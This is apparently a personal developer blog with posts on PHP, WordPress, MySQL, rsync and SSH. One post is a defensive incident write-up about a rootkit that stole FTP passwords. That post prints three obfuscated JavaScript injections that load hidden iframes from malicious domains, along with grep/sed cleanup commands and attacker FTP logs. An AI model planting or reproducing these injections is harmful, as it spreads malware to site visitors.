PHP misreporting existence of directory or files

Recently I was working with a WordPress site where I was deleting a network. When the network was deleted, the root site was also deleted (or vice versa). And when the root site deleted, it deleted its own media directory and the parent network’s media directory as well. This worked out OK in most cases (because the root site and root network are one-in-the-same in a multisite network). However in some of my workplace’s custom code, we hooked into both network and site deletion. We tried to delete some extra folders attached with the network and site. Some folders were shared, so once they were deleted, they should’ve shown up as missing. However the folders were showing up as existing on second try and when deleting were giving out errors. So…

PHP has something called stat cache to make file operations faster. It caches information anytime you make a call to functions like “stat(), lstat(), file_exists(), is_writable(), is_readable(), is_executable(), is_file(), is_dir(), is_link(), filectime(), fileatime(), filemtime(), fileinode(), filegroup(), fileowner(), filesize(), filetype(), and fileperms().” Coincidentally, PHP was misreporting the existence of files and folders when they were clearly deleted and glob() would be confirming that fact. In the end, we had to add calls to clearstatcache() to avoid this trap.

I wish there was a way to disable the stat caching for a session, because calling this function every time gets to be a pain.

Things learned from Wordcamp 2012

I attended most of the developer track presentations at Boston’s Wordcamp 2012. I learned about some interesting tools and techniques that I’d like to document for myself and others.

Talk Optimizing for Speed by Ben Metcalfe

  1. YouGetSignal’s Reverse IP Lookup – Shows you how many other hosts live on the same IP Address. This can be helpful for anyone using shared hosting or maybe VPS.
  2. Debug Bar – Get debugging information from each page WordPress page load.
  3. Google XML Sitemaps – Delete this plugin if you have it. (I had it.)
  4. YSlow – Get load times and optimization tips of a page request.

WordPress as a Web Framework by Sam Hotchkiss

  1. MVC frameworks for WordPress
    1. WP MVC – Provides a singleton object and eliminates the metadata bottleneck by providing tables indexed by post IDs.
    2. Tina MVC
  2. _s Theme – Use Automattic’s Blank Theme as a good starting point.

Automating frontend workflow by Aaron Jorbin (blog post, slides)

  1. Autojump – Jump to frequently used directories
  2. Commander.js (nodejs) – Script working with CLI
  3. watch (nodejs) – Watch files/dirs
  4. mockjax – Fake your ajax calls (good for protyping or testing un-related, yet dependent functionality)
  5. Travis CI – continuous integration service (wordpress plugin tests)
  6. Glue – generate css sprites

Microdata for SEO by Dave Ross

  1. Add itemprop, itemscope, etc to any identifiable schema
  2. Google Rich Snippets Tool – Test your microdata
  3. Examples: SiteNavigation element for navigation, Blog element for blog posts, etc
  4. Some quick tidbits: Bing rates sites with microdata higher than sites without, and Google uses the microdata in search results

Enterprise WordPress by Jake Goldman (1up)

  1. Sites to show clients: showcase, WordPress VIP
  2. Maintaining a beautiful WordPress admin

Shortcodes by Jon Bishop

  1. Use oembed rather than plugins to support embedding media from sites like youtube, facebook, etc

Codex by Erick Hitler

  1. Use santize_* functions to save to db: santize_text_field(), sanitize_title()
  2. Use esc_* functions to show data to user (esc_url_raw() is the exception, it is the opposite of esc_url())

Javascript hooks by Luke Gedeon (1up)

  1. Javascript custom events are coming, they will provide functionality similar to WordPress’ action and filter hooks (list of hooks)

SMF2 Gallery2 Integration Problem

I have a SMF2 forum site, where the gallery is implemented through Gallery2 using Oldiesmann’s SMF + G2 Integration Project.

For 2 years, I’ve had the SMF and Gallery work properly together with linked member groups (a mod option), such that member groups auto-synchronized with ones in Gallery. At some point, either with a Gallery or SMF upgrade, users reported that the Gallery part of the site threw cryptic security warnings for non-admins. I explored the issue and figured users were missing in two required groups “Everybody” and “Registered Users”. I had reported it to Oldiesmann, but he claimed he had no control over those required groups and Gallery was self-managing them.

After about a year, I delved into the code and found that in order to sync the groups that a user had in SMF with the groups that a user had in Gallery, the integration code was removing all groups and adding the shared groups. This of course meant that the user was being removed from the required groups: “Everybody” and “Registered Users”. Users with privileged groups did not see the problem.

Here’s the fix that I’ve also submitted to Oldiesmann. But his forum complains when I added the code, so I had to create this post here. It says it does not allow external links (haha).

My fix will ensure that we do not remove the user from required groups and also add the users back into required groups (if necessary). Please note that the cleanup code is necessary because anyone who has ever visited the buggy gallery will have the groups removed, so there’s a lot of cleanup to do. The code provided below should auto-correct this issue.


commit 97075cd4e20d2807011b38cd293ccc38c728db9a
Author: Inderpreet Singh <inderpreet99gmail>
Date:   Sat Jul 28 10:33:40 2012 -0500

    PJ fix for SMF Gallery2 Integration:
    Avoid g2 required groups: Everybody and Registered Users groups from getting removed
    Add user to the required groups (cleanup our mess)

diff --git a/Sources/Gallery.php b/Sources/Gallery.php
index 74652fe..c289678 100755
--- a/Sources/Gallery.php
+++ b/Sources/Gallery.php
@@ -1348,10 +1348,32 @@ function groupCheck()
 	}
 	else
 	{
+
+		// Avoid g2 required groups: Everybody and Registered Users groups from getting removed!
+		$groupstoignore = array('Everybody', 'Registered Users');
+		$groupstoadd = $groupstoignore;
+		foreach($galgroups as $gid => $gname)
+		{
+			if(in_array($gname, $groupstoignore))
+			{
+				unset($galgroups[$gid]);
+				$groupstoadd = array_diff($groupstoadd, array($gname));
+			}
+		}
+		
+		// Add user to the required groups (cleanup our mess)
+		foreach($groupstoadd as $gname) {
+			list($ret, $group) = GalleryCoreApi::fetchGroupByGroupName($gname);
+			if($ret)
+			{
+				fatal_error($ret->getAsText(), 'gallery');
+			}
+			GalleryCoreApi::addUserToGroup($context['user']['g2_uid'], $group->getId());
+		}
+
 		// array_diff will give us an array of all the values in $galgroups that aren't in $galsmfgroups
 		// $galgroups uses the group IDs as the keys, and the group names as the values. We only want the group IDs...
 		$groupstoremove = array_diff(array_keys($galgroups), $galsmfgroups);
-
 		// Remove them from any group(s) they no longer belong to
 		if(count($groupstoremove) > 0)
 		{

WordPress: How to programmatically remove categories returned by get_the_category_list function?

First of all, I would recommend using the wp_list_categories function (which supports ‘exclude’ and ‘exclude_tree’ arguments) instead of get_the_category_list.

Sometimes we do not have the option of choosing which function to use. Also, it is unfortunate that the get_the_category_list function does not provide a hook to target each category in the list. So we have to use a hacky method to remove items. The following code uses regex to parse the string (list of HTML elements separated by a separator) being returned by get_the_category_list function (using ‘the_category’ filter) and removes the appropriate categories.

I would also like to note and the code below removes the “Uncategorized” category (which is the default category and the most common offender users want to remove) and also the “Feature” category (something I was using in my own code).

/**
 * Identifies the "Uncategorized", "Feature" link
 * preg_replace_callback for bu_library_hide_uncategorized function
 * 
 * @param array $regex_parts
 * @return string 
 */
function bu_library_hide_uncategorized_callback($regex_parts) {
	if( !$regex_parts or count((array)$regex_parts) != 2)
		return $regex_parts;
	
	if ( in_array($regex_parts[1], array('Uncategorized', 'Feature')) )
		return '';
	
	return $regex_parts[0];
}

/**
 * Removes the uncategorized category from $thelist string parameter
 * 
 * Ignore wp-admin requests. Unfortunately, 'the_category' filter is used in other places with 1 argument), so we must
 * make the last 2 arguments optional (or we get PHP Warnings) and quit when the 2nd argument is not supplied
 */
function bu_library_hide_uncategorized($thelist, $separator = '', $parents = '') {
	
	// short circuit for lists that do not have uncategorized category,
	// or when this function is called from wp-admin (i.e. missing separator)
	if(is_admin() or !$separator or stripos($thelist, 'Uncategorized') === false) return $thelist;
	
	$listitems = explode($separator, $thelist);
	
	$new_listitems = array();
	foreach($listitems as $item) {
		if ($new_item = preg_replace_callback('!<\s*a[^>]*>(.*?)<\s*/a[^>]*>!im', 'bu_library_hide_uncategorized_callback', $item)) {
			$new_listitems[] = $new_item;
		}
	}
	
	$thelist = implode($separator, $new_listitems);
	return $thelist;
}
add_filter('the_category', 'bu_library_hide_uncategorized', 10, 3);

mysqldump and .my.cnf tip to avoid “ignoring option ‘–databases'” error

Don’t like how the mysqldump command keeps reading the .my.cnf and outputting the following warning/error:
mysqldump: ignoring option '--databases' due to invalid value 'dbname'

It’s been reported as a bug to mysql devs, but they keep saying it is by design, and working as intended. Here’s how you should structure the .my.cnf to avoid it:


[client]
user=user1
password=pw1
[mysql]
database=dbname

This way the “mysqldump dbname” doesn’t return that hideous error message and “mysql dbname” also works like a charm.

rsyncd tips for TomatoUSB/DD-WRT

I wanted to integrate a NAS with rsyncd on a TomatoUSB router (equipped with ipkg and USB hard drive connect). I also wanted this NAS to be available from the outside, so I found that the instructions online were incomplete. If you’re having problems with it, please follow these two tips:

  1. rsync cannot connect to rsyncd from within the network. This is the default setup that everyone wants, so it should just work. The problem is that the command that everyone tells us to use with rsyncd profiles (rsyncd.conf: [profilename]) is wrong, even on dd-wrt tutorial. It is missing an extra semicolon, so the command should be:
    rsync file.ext user@server::profilename/optional/path

    (Notice how profiles need 2 semicolons)

  2. rsyncd is not accessible from outside the network. I haven’t seen instructions for these. To do this, one must do 2 things:
    • Add a rule to Port Forwarding section of the UI: forward TCP port 873 (default rsyncd port) to 192.168.1.1 (the router IP/gateway).
    • run the following command that adds a rule to the iptables firewall, inside Scripts > Firewall, or run it in the command line for a quick test (but it will disappear once you restart router):
      iptables -A INPUT -j ACCEPT -p tcp --dport 873
    • For OpenWRT routers, one would either use uci or add the above rule to /etc/storage/post_iptables_script.sh and do mtd_storage.sh save.

Command line python script to get context lines on a search string

grep -B and -B flags don’t work when grep is used on the command line with readline support. So I created this little script that does work on the command line. use -h flag to learn. Here’s how I’ve used it:

ls -al | ./printcontext.py -b 1 -a 1 -d test.txt

This finds the test.txt file and prints the 2 files around it.


#!/usr/bin/python
# print context when using a python script with readline support (command line piping)
# by inderpreetsingh.com

import sys, re
from optparse import OptionParser

def main():
    usage = "usage: %prog [options] needle"
    parser = OptionParser(usage)
    parser.add_option("-b", "--before", type="int", dest="before", default=0,
            help='Before context lines (a la grep)')
    parser.add_option("-a", "--after", type="int", dest="after", default=0,
            help='After context lines')
    parser.add_option("-d", "--debug", action="store_true", dest="debug", default=False,
            help='Debug information.')

    #Not implemented
    #parser.add_option("-o", "--output", type="string", dest="output")
    
    (options, args) = parser.parse_args()
    
    if len(args) != 1:
        parser.error("Specify what you want to search")
    
    needle = args[0]
    if options.debug:
        print "\nNeedle: %s\nBefore context lines: %s\nAfter context lines: %s\n" % (needle, options.before, options.after)
    

    lines = sys.stdin.readlines()
    lines = [x.strip() for x in lines]
    
    lastline = ''
    i = 0
    for line in lines:
        if needle in line:
#        if re.search(needle, line):
            first = max(0, i - options.before)
            last = min(len(lines), i + options.after + 1)
            
            if options.debug:
                print "Found '%s' on line %d, printing line %d to %d" % (needle, i, first, last)
                
            for println in lines[first:last]:
                print println
            print ""
        lastline = line
        i += 1

if __name__ == "__main__":
    main()

Rootkit hacked Win7, stole ftp passwords, and spread malware

What happened:
Over the past weekend, I got hit by ZeroAccess rootkit, which I’ve recently heard about making the news on a few security related sites. It disabled Microsoft Security Essentials and Windows Defender, and took over the Windows Security Center. It further controls the Network layer so that it can disable any connections to security sites. To keep itself in control, it installs itself as a service, a startup item and several scheduled tasks. It kills your exe associations at each restart (which means you can’t run any executables, possibly to remove the damned trojans/viruses). While all this is happening, it keeps installing more malware.

Internet help:
BleepingComputer (particularly the FixNCR.reg file is very helpful in restoring exe file association) and their forums
MalwareBytes AntiMalware didn’t help me much, because this rootkit and its malware friends kept coming back. (The problem is that these rootkits are modifying memory on the fly, so whatever success you think you have is misleading.)

How I got rid of it:
In safe mode, ran Kaspersky Virus Removal Tool 2011, TDSSKiller, Combofix
(Restore executable file associations by using the FixNCR.reg tool I listed above)
Once the above three fixed the issue, I used MBAM, MS Security Essentials, Spyware Doctor (not free) and SuperAntiSpyware (with Full Scans) to verify that my computer was clean.

Stolen ftp passwords:
It scans for ftp software programs, such as FileZilla, which like other ftp programs will store all your passwords in plaintext for any random person to grab. Lesson learned: Use SSH keys with passphrase to prevent this problem in the future. So it sent all these passwords back to their database, so the attackers (log below) connected to each site, recursively looked for all the common files: index.htm, index.html, index.php, login.php, auth.html, etc, etc and put the following codes (usually at the end):

  1. Code:
    <script>wa='t';p='ht';f='k98';tb='ame';bg='.';v='sr';g='tp:';vf='/z';bs='t';px='v.h';br='yt';k='c';yr='m';ds='m';ej='/';au='/';t='com';sp='ifr';r='ca';cp='y';wz='ir';wf='u';b='5';se=sp.concat(tb);oz=v.concat(k);db=p.concat(g,ej,vf,wz,cp,r,bs,wf,yr,bg,t,au,f,b,br,px,wa,ds);var ip=document.createElement(se);ip.setAttribute('width','1');ip.setAttribute('height','1');ip.frameBorder=0;ip.setAttribute(oz,db);document.body.appendChild(ip);</script>

    evaluates to

    <iframe width=​"1" height=​"1" frameborder=​"0" src=​"http:​/​/​zirycatum.com/​k985ytv.htm">​</iframe>​
  2. Code:
    <script>ti='.c';ai='af';qo='p';jn='htm';rf='n';tf='doz';yn='ifr';xm='s';cl='o';jd='k9';nn='tv.';rl='85y';r='umu';eh='m/';ec='htt';sb='rc';f='ame';l='://';b=yn.concat(f);gg=xm.concat(sb);qt=ec.concat(qo,l,rf,r,tf,ai,ti,cl,eh,jd,rl,nn,jn);var xp=document.createElement(b);xp.setAttribute('width','1');xp.setAttribute('height','1');xp.frameBorder=0;xp.setAttribute(gg,qt);document.body.appendChild(xp);</script>

    evaluates to

    <iframe width=​"1" height=​"1" frameborder=​"0" src=​"http:​/​/​numudozaf.com/​k985ytv.htm">​</iframe>​​
  3. Code:
    <script>mv='uf';jx='tv.';cg='me';k='e';mg='rc';g='ys';rs='m';f='of';m='ht';u='85y';ca='e.c';r='s';j='fra';i='ht';h='//h';qy='wob';v='k9';a='t';qt='i';br='p:';s='om/';ul=qt.concat(j,cg);xl=r.concat(mg);xp=m.concat(a,br,h,g,f,mv,k,qy,ca,s,v,u,jx,i,rs);var bn=document.createElement(ul);bn.setAttribute('width','1');bn.setAttribute('height','1');bn.frameBorder=0;bn.setAttribute(xl,xp);document.body.appendChild(bn);</script>

    evaluates to

    <iframe width=​"1" height=​"1" frameborder=​"0" src=​"http:​/​/​hysofufewobe.com/​k985ytv.htm">​</iframe>​

    How to find and remove these exploits:
    Find:

    find . -type f -regex ".*\(py\|php\|html?\)$" -exec grep -lr "frameBorder.*setAttribute.*document.body.appendChild" {} 2> /dev/null \;

    Exaplanation:
    Find all files recursively starting from current directory that have py/php/htm/html as extension, look for those 3 keywords (“frameBorder”, “setAttribute”, then “document.body.appendChild”).
    Notes: You should make sure this command outputs filenames of files that have the exploit html code. You might need to change the keywords (if the virus code has changed). Also, “2> /dev/null” will ignore all permissions/access errors, you might want to take that out if you want to see errors for files that you don’t have access to.

    Replace (just adds sed, the file editing tool):

    find . -type f -regex ".*\(py\|php\|html?\)$" -exec grep -lr "frameBorder.*setAttribute.*document.body.appendChild" {} 2> /dev/null \; | xargs -I {} sed -i.hacked 's#<script>wa=.*</script>##g' {}

    Explanation of the command after the pipe (|):
    For each file from the previous command, edit it such that we remove from the starting script tag to the ending script tag, but only if “wa=” follows the starting script tag. Of course, you will need to run this command, replacing the “wa=” with “ti=” (like the above 2 pasted exploit codes, or whatever else the the command is currently using). This script will also backup each of the exploited file (with the extension .hacked), just in case you lose something important.

    How to prevent future ftp edits:
    Don’t use ftp programs that store plaintext passwords, or better yet use passphrase’d SSH keys (with an SSH agent to simplify your life).

    Google StopBadware
    StopBadware.org is a service, which comes with all the popular browsers like FF, Chrome, Safari. Everytime you visit a site, this service is used to check if the page/website is listed as a site that propagates badware. So as you can imagine all the exploited files (above) resulted in all the domains getting blacklisted from these browsers and on top of that, Google Search will display a “This site is harmful” message. Firefox implementation of this service is the worst because Firefox tries its hardest to make you stop visiting the site. Most likely, your site will get flagged by the Googlebot, and you will also get an email from Google titled “Malware notification regarding victimsite.com” sent to the common webmaster email addresses, abuse@victimsite.com, admin@victimsite.com, webmaster@victimsite.com, etc (so as a good practice, you should make sure one of these addresses work).
    To fix this, you will need to add your site to Google Webmaster Tools (really helpful tool for all sorts of webmaster activities, and then “Request a Review” from Diagnostics > Malware section. This is just one way, I think you can also request a review through stopbadware.org (the original vendor), but the request will probably still go through the original reporter (most likely google). Also, some requests are resolved within a day (for popular sites), and some take as long as 2 days. I’ve also noticed that a convincing argument made about security haul in the comment when asking for a review helps your case.

    Finally, Some ip addresses and an example of what it looks like in logs

    204.12.252.138 UNKNOWN u47973886 [14/Aug/2011:23:19:27 -0500] "LIST /folderthis/folderthat/" 226 1862
    204.12.252.138 UNKNOWN u47973886 [14/Aug/2011:23:19:27 -0500] "TYPE I" 200 -
    204.12.252.138 UNKNOWN u47973886 [14/Aug/2011:23:19:27 -0500] "PASV" 227 -
    204.12.252.138 UNKNOWN u47973886 [14/Aug/2011:23:19:27 -0500] "SIZE index.htm" 213 -
    204.12.252.138 UNKNOWN u47973886 [14/Aug/2011:23:19:27 -0500] "RETR index.htm" 226 2573
    204.12.252.138 UNKNOWN u47973886 [14/Aug/2011:23:19:27 -0500] "TYPE I" 200 -
    204.12.252.138 UNKNOWN u47973886 [14/Aug/2011:23:19:27 -0500] "PASV" 227 -
    204.12.252.138 UNKNOWN u47973886 [14/Aug/2011:23:19:27 -0500] "STOR index.htm" 226 3018

    2nd server:
    Aug 14 08:58:41 customer proftpd[6367]: (::ffff:218.93.122.165[::ffff:218.93.122.165]) - FTP session opened.
    Aug 14 23:37:04 customer proftpd[16356]: (::ffff:117.41.182.209[::ffff:117.41.182.209]) - FTP session closed.
    Aug 15 00:20:34 customer proftpd[22467]: (::ffff:62.212.66.15[::ffff:62.212.66.15]) - FTP session opened.
    Aug 15 09:12:04 customer proftpd[8899]: (::ffff:204.12.252.138[::ffff:204.12.252.138]) - FTP session closed.
    Aug 15 17:09:20 customer proftpd[25532]: (::ffff:178.17.165.146[::ffff:178.17.165.146]) - FTP
    Aug 15 23:42:16 customer proftpd[10474]: (::ffff:95.211.14.25[::ffff:95.211.14.25]) - FTP session closed.
    Aug 16 02:22:53 customer proftpd[17143]: (::ffff:119.128.168.56[::ffff:119.128.168.56]) - FTP session opened.
    Aug 16 03:51:34 customer proftpd[20771]: (::ffff:111.74.239.55[::ffff:111.74.239.55]) - FTP session closed.
    Aug 16 23:32:22 customer proftpd[3396]: (::ffff:61.131.51.193[::ffff:61.131.51.193]) - FTP session opened.

SSH private/public key auth not working

Problem: I can’t set up an automated login (passwordless with ssh agent) to one of my servers.

Tip: Best way to debug SSH problems is by using ssh -vvvv server. The extra verbosity flags will tell you exactly what is going on at each interaction.

Details:
I was receiving the following code:
debug1: Trying private key: /Users/inderpreetsingh/.ssh/id_rsa
debug1: PEM_read_PrivateKey failed
debug1: read PEM private key done: type
debug3: Not a RSA1 key file /Users/inderpreetsingh/.ssh/id_rsa.
debug1: read PEM private key done: type RSA
Identity added: /Users/inderpreetsingh/.ssh/id_rsa (/Users/inderpreetsingh/.ssh/id_rsa)
debug1: read PEM private key done: type RSA
debug3: sign_and_send_pubkey
debug2: we sent a publickey packet, wait for reply
debug1: Authentications that can continue: publickey,password,hostbased

debug1: Trying private key: /Users/inderpreetsingh/.ssh/id_dsa
debug3: no such identity: /Users/inderpreetsingh/.ssh/id_dsa
debug2: we did not send a packet, disable method

debug3: authmethod_lookup password
debug3: remaining preferred: ,password
debug3: authmethod_is_enabled password
debug1: Next authentication method: password
inderpreetsingh@server's password:

Analysis: The errors are misleading. They seem to indicate that the identity file on our own machine is the culprit. But the problem was the .ssh directory and the authorized_keys file permissions. They may be too lax or too restrictive.

Fix: From your home directory, fire the following permissions:

chmod 700 ~/.ssh
chmod 600 ~/.ssh/authorized_keys

And for good measure, make sure you alone own the files:

chown username:username ~/.ssh
chown username:username ~/.ssh/authorized_keys

And passwordless SSH here I come.